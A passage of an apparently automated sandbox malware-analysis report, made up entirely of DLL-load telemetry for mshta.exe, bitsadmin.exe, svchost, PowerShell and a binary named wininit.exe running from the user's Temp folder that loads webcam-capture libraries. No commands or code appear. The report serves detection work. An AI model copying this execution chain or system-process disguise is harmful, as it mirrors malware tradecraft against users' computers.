                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
